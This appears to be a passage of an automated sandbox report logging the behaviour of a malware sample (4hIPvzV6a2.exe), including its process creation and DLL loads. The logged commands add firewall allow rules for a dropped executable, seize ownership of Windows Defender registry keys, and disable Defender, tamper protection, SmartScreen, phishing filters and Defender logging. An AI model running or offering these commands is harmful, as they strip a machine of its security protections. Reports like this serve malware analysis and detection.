Source: C:\Users\user\Desktop\4hIPvzV6a2.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name=oofzzwcvgbcojt dir=in action=allow program="C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\oofzzwcvgbcojt.exe" enable=yes profile=public,privateJump to behavior
Source: C:\Users\user\Desktop\4hIPvzV6a2.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name=oofzzwcvgbcojt dir=out action=allow program="C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\oofzzwcvgbcojt.exe" enable=yes profile=public,privateJump to behavior
Source: C:\Users\user\Desktop\4hIPvzV6a2.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\bn.batJump to behavior
Source: C:\Users\user\Desktop\4hIPvzV6a2.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\bn1.batJump to behavior
Source: C:\Users\user\Desktop\4hIPvzV6a2.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\4hIPvzV6a2.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\4hIPvzV6a2.exeProcess created: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn setowner -ownr "n:Administrators"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn setowner -ownr "n:Administrators"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrators;p:full"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t reg_DWORD /d "4" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t reg_DWORD /d "2" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t reg_DWORD /d "0" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t reg_DWORD /d 1 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\RemovalTools\MpGears" /v "SpyNetReportingLocation" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\SOFTWARE\Policies\Microsoft\Edge" /v "SmartScreenEnabled" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_EdgeSmartScreenOff" /t REG_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_StoreAppsSmartScreenOff" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "RandomizeScheduleTaskTimes" /t reg_DWORD /d "0" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "PUAProtection" /t reg_DWORD /d "0" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t reg_DWORD /d 1 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v "DisableAutoExclusions" /t reg_DWORD /d "1" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_StoreAppsSmartScreenOff" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t reg_DWORD /d 1 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\SOFTWARE\Policies\Microsoft\Edge" /v "SmartScreenEnabled" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t reg_DWORD /d "4" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t reg_DWORD /d "2" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_EdgeSmartScreenOff" /t REG_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\4hIPvzV6a2.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\4hIPvzV6a2.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\4hIPvzV6a2.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\4hIPvzV6a2.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\4hIPvzV6a2.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\Desktop\4hIPvzV6a2.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\4hIPvzV6a2.exeSection loaded: oleacc.dllJump to behavior
Source: C:\Users\user\Desktop\4hIPvzV6a2.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\Desktop\4hIPvzV6a2.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\4hIPvzV6a2.exeSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\Desktop\4hIPvzV6a2.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\4hIPvzV6a2.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\4hIPvzV6a2.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ifmon.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprapi.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasmontr.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mfc42u.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: authfwcfg.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpolicyiomgr.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: firewallapi.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwbase.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcmonitor.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3cfg.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3api.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: onex.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappcfg.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappprxy.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwcfg.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: hnetmon.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netshell.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netsetupapi.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netiohlp.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: httpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshipsec.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: activeds.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: polstore.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winipsec.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshwfp.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2pnetsh.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2p.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rpcnsh.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: whhelper.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlancfg.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlanapi.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wshelper.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wevtapi.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: peerdistsh.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wcmapi.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rmclient.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mobilenetworking.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ktmw32.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprmsg.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ifmon.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprapi.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasmontr.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mfc42u.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: authfwcfg.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpolicyiomgr.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: firewallapi.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwbase.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcmonitor.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3cfg.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3api.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: onex.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappcfg.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappprxy.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwcfg.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: hnetmon.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netshell.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netsetupapi.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netiohlp.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: httpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshipsec.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: activeds.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: polstore.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winipsec.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshwfp.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cabinet.dllJump to behavior
